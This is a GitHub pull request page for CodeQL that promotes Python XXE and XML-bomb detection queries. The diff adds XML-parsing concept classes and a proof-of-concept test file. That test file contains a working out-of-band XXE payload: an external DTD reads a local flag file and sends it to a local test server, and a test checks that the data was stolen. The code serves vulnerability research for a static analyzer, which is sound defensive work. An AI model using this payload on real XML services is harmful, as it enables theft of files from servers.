Skip to content

Python: Promote XXE and XML-bomb queries #8634

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 54 commits into from
May 9, 2022
Merged
Show file tree
Hide file tree
Changes from 50 commits
Commits
Show all changes
54 commits
Select commit Hold shift + click to select a range
65907c9
Python: Copy Xxe/XmlBomb queries from JS
RasmusWL Mar 24, 2022
e45f9d6
Python: Adjust Xxe/XmlBomb for Python
RasmusWL Mar 24, 2022
91795b8
Python: Add simple test of Xxe/XmlBomb
RasmusWL Mar 24, 2022
a1d88e3
Python: Adjust XXE PoC for newer lxml versions
RasmusWL Mar 24, 2022
57b9780
Python: XXE: Add example of exfiltrating data through dtd-retrival
RasmusWL Mar 24, 2022
769f569
Python: Add taint for `StringIO` and `BytesIO`
RasmusWL Mar 29, 2022
c365337
Python: Delete `XmlEntityInjection.ql`
RasmusWL Mar 29, 2022
b00766b
Python: Adjust XXE qhelp
RasmusWL Mar 29, 2022
56b9c89
Python: Adjust `XmlBomb.qhelp` from JS
RasmusWL Mar 29, 2022
9caf4be
Python: Add PortSwigger link to `Xxe.qhelp`
RasmusWL Mar 29, 2022
e005a5c
Python: Promote `XMLParsing` concept
RasmusWL Mar 29, 2022
e45288e
Python: => `XMLParsingVulnerabilityKind`
RasmusWL Mar 29, 2022
35ccba2
Python: Promote `XMLParsing` concept test
RasmusWL Mar 29, 2022
1ea4bcc
Python: Make `XMLParsing` a `Decoding` subclass
RasmusWL Mar 29, 2022
c4473c5
Python: Rename lxml XPath tests
RasmusWL Mar 31, 2022
3040adf
Python: Handle `XMLParser().close()` for XPath
RasmusWL Mar 31, 2022
80b5cde
Python: Promote lxml parsing modeling
RasmusWL Mar 31, 2022
7f5f767
Python: Promote `xmltodict` modeling
RasmusWL Mar 31, 2022
64aa503
Python: Promote `xml.etree` modeling
RasmusWL Mar 31, 2022
a315aa8
Python: Add some links in QLDocs
RasmusWL Mar 31, 2022
6774085
Python: Add note about parseid/XMLID
RasmusWL Mar 31, 2022
12cbdcd
Python: Model `lxml.etree.XMLID`
RasmusWL Mar 31, 2022
386ff53
Python: Model `lxml.iterparse`
RasmusWL Mar 31, 2022
543454e
Python: Model file access from XML parsing
RasmusWL Mar 31, 2022
db43d04
Python: Add test showing misalignment of xml.etree modeling
RasmusWL Mar 31, 2022
70b3eec
Python: Merge `xml.etree.ElementTree` models
RasmusWL Mar 31, 2022
05bb0ef
Python: Align `xml.etree.ElementTree` modeling
RasmusWL Mar 31, 2022
e112697
Python: Promote `xml.sax` and `xml.dom.*` modeling
RasmusWL Mar 31, 2022
1d7cec6
Python: `xml.sax.parse` is not a method call
RasmusWL Mar 31, 2022
b4c0065
Python: Extend FileSystemAccess for `xml.sax` and `xml.dom.*` parsing
RasmusWL Mar 31, 2022
673220b
Python: Minor cleanup of `XmlParsingTest`
RasmusWL Mar 31, 2022
5083023
Python: Move XML parsing PoC
RasmusWL Mar 31, 2022
b8d3c5e
Python: Remove last bits of experimental XML modeling
RasmusWL Mar 31, 2022
4abab22
Python: Promote XXE and XML-bomb queries
RasmusWL Mar 31, 2022
d2b03bb
Python: Fix `SimpleXmlRpcServer.ql`
RasmusWL Mar 31, 2022
ab59d5c
Python: Rename to `XmlParsing`
RasmusWL Apr 5, 2022
1f285b8
Python: Rename to `XmlParsingVulnerabilityKind`
RasmusWL Apr 5, 2022
a7dab53
Python: Add change-note
RasmusWL Apr 5, 2022
b7f56dd
Python: Rewrite concepts to use `extends ... instanceof ...`
RasmusWL Apr 5, 2022
23637fd
Merge branch 'main' into promote-xxe
RasmusWL Apr 6, 2022
c784f15
Python: Rename more XML classes to follow convention
RasmusWL Apr 6, 2022
f2f0873
Python: Use new `API::CallNode` for XML constant check
RasmusWL Apr 6, 2022
7728b6c
Python: Change XmlBomb vulnerability kind
RasmusWL Apr 7, 2022
405480c
Python: Rename sink definitions for XXE/XML bomb
RasmusWL Apr 7, 2022
8191be9
Python: Move last XXE/XML bomb out of experimental
RasmusWL Apr 7, 2022
517444b
Python: Fix `SimpleXmlRpcServer.expected`
RasmusWL Apr 7, 2022
bb6969a
Merge branch 'main' into promote-xxe
RasmusWL Apr 20, 2022
5f01fc2
Merge branch 'main' into promote-xxe
RasmusWL May 2, 2022
714465b
Python: Refactor `SaxParserSetFeatureCall`
RasmusWL May 2, 2022
f5854f3
Python: Apply suggestions from code review
RasmusWL May 9, 2022
f22bd03
Python: Slight refactor of `LxmlParsing`
RasmusWL May 9, 2022
3634922
Python: Fix casing of `XMLDomParsing`
RasmusWL May 9, 2022
de05b10
Python: Fix singleton set
RasmusWL May 9, 2022
4a67891
Python: Apply suggestions from code review
RasmusWL May 9, 2022
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
1 change: 1 addition & 0 deletions docs/codeql/support/reusables/frameworks.rst
Original file line number Diff line number Diff line change
Expand Up @@ -214,3 +214,4 @@ Python built-in support
libtaxii, TAXII utility library
libxml2, XML processing library
lxml, XML processing library
xmltodict, XML processing library
1 change: 1 addition & 0 deletions python/PoCs/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
A place to collect proof of concept for how certain vulnerabilities work.
Original file line number Diff line number Diff line change
Expand Up @@ -70,6 +70,14 @@
<foo>bar</foo>
"""

exfiltrate_through_dtd_retrieval = f"""<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://{HOST}:{PORT}/exfiltrate-through.dtd"> %xxe; ]>
"""

predefined_entity_xml = """<?xml version="1.0"?>
<test>&lt;</test>
"""

# ==============================================================================
# other setup

Expand All @@ -95,6 +103,22 @@ def test_xxe():
hit_xxe = True
return "ok"

@app.route("/exfiltrate-through.dtd")
def exfiltrate_through_dtd():
return f"""<!ENTITY % file SYSTEM "file://{FLAG_PATH}">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://{HOST}:{PORT}/exfiltrate-data?data=%file;'>">
%eval;
%exfiltrate;
"""

exfiltrated_data = None
@app.route("/exfiltrate-data")
def exfiltrate_data():
from flask import request
global exfiltrated_data
exfiltrated_data = request.args["data"]
return "ok"

def run_app():
app.run(host=HOST, port=PORT)

Expand Down Expand Up @@ -346,7 +370,7 @@ def test_local_xxe_enabled_by_default():
parser = lxml.etree.XMLParser()
root = lxml.etree.fromstring(local_xxe, parser=parser)
assert root.tag == "test"
assert root.text == "SECRET_FLAG\n", root.text
assert root.text == "SECRET_FLAG", root.text

@staticmethod
def test_local_xxe_disabled():
Expand All @@ -361,11 +385,7 @@ def test_remote_xxe_disabled_by_default():
hit_xxe = False

parser = lxml.etree.XMLParser()
try:
root = lxml.etree.fromstring(remote_xxe, parser=parser)
assert False
except lxml.etree.XMLSyntaxError as e:
assert "Failure to process entity remote_xxe" in str(e)
root = lxml.etree.fromstring(remote_xxe, parser=parser)
assert hit_xxe == False

@staticmethod
Expand Down Expand Up @@ -416,6 +436,23 @@ def test_dtd_manually_enabled():
pass
assert hit_dtd == False

@staticmethod
def test_exfiltrate_through_dtd():
# note that this only works when the data to exfiltrate does not contain a newline :|
global exfiltrated_data
exfiltrated_data = None
parser = lxml.etree.XMLParser(load_dtd=True, no_network=False)
with pytest.raises(lxml.etree.XMLSyntaxError):
lxml.etree.fromstring(exfiltrate_through_dtd_retrieval, parser=parser)

assert exfiltrated_data == "SECRET_FLAG"

@staticmethod
def test_predefined_entity():
parser = lxml.etree.XMLParser(resolve_entities=False)
root = lxml.etree.fromstring(predefined_entity_xml, parser=parser)
assert root.tag == "test"
assert root.text == "<"

# ==============================================================================

Expand Down
1 change: 1 addition & 0 deletions python/PoCs/XmlParsing/flag
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
SECRET_FLAG
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
---
category: minorAnalysis
---
* Added taint propagation for `io.StringIO` and `io.BytesIO`. This addition was originally [submitted as part of an experimental query by @jorgectf](https://github.com/github/codeql/pull/6112).
59 changes: 59 additions & 0 deletions python/ql/lib/semmle/python/Concepts.qll
Original file line number Diff line number Diff line change
Expand Up @@ -498,6 +498,65 @@ module XML {
abstract string getName();
}
}

/**
* A kind of XML vulnerability.
*
* See overview of kinds at https://pypi.org/project/defusedxml/#python-xml-libraries
*
* See PoC at `python/PoCs/XmlParsing/PoC.py` for some tests of vulnerable XML parsing.
*/
class XmlParsingVulnerabilityKind extends string {
XmlParsingVulnerabilityKind() { this in ["XML bomb", "XXE", "DTD retrieval"] }

/**
* Holds for XML bomb vulnerability kind, such as 'Billion Laughs' and 'Quadratic
* Blowup'.
*
* While a parser could technically be vulnerable to one and not the other, from our
* point of view the interesting part is that it IS vulnerable to these types of
* attacks, and not so much which one specifically works. In practice I haven't seen
* a parser that is vulnerable to one and not the other.
*/
predicate isXmlBomb() { this = "XML bomb" }

/** Holds for XXE vulnerability kind. */
predicate isXxe() { this = "XXE" }

/** Holds for DTD retrieval vulnerability kind. */
predicate isDtdRetrieval() { this = "DTD retrieval" }
}

/**
* A data-flow node that parses XML.
*
* Extend this class to model new APIs. If you want to refine existing API models,
* extend `XmlParsing` instead.
*/
class XmlParsing extends Decoding instanceof XmlParsing::Range {
/**
* Holds if this XML parsing is vulnerable to `kind`.
*/
predicate vulnerableTo(XmlParsingVulnerabilityKind kind) { super.vulnerableTo(kind) }
}

/** Provides classes for modeling XML parsing APIs. */
module XmlParsing {
/**
* A data-flow node that parses XML.
*
* Extend this class to model new APIs. If you want to refine existing API models,
* extend `XmlParsing` instead.
*/
abstract class Range extends Decoding::Range {
/**
* Holds if this XML parsing is vulnerable to `kind`.
*/
abstract predicate vulnerableTo(XmlParsingVulnerabilityKind kind);

override string getFormat() { result = "XML" }
}
}
}

/** Provides classes for modeling LDAP-related APIs. */
Expand Down
1 change: 1 addition & 0 deletions python/ql/lib/semmle/python/Frameworks.qll
Original file line number Diff line number Diff line change
Expand Up @@ -52,3 +52,4 @@ private import semmle.python.frameworks.Ujson
private import semmle.python.frameworks.Urllib3
private import semmle.python.frameworks.Yaml
private import semmle.python.frameworks.Yarl
private import semmle.python.frameworks.Xmltodict
Loading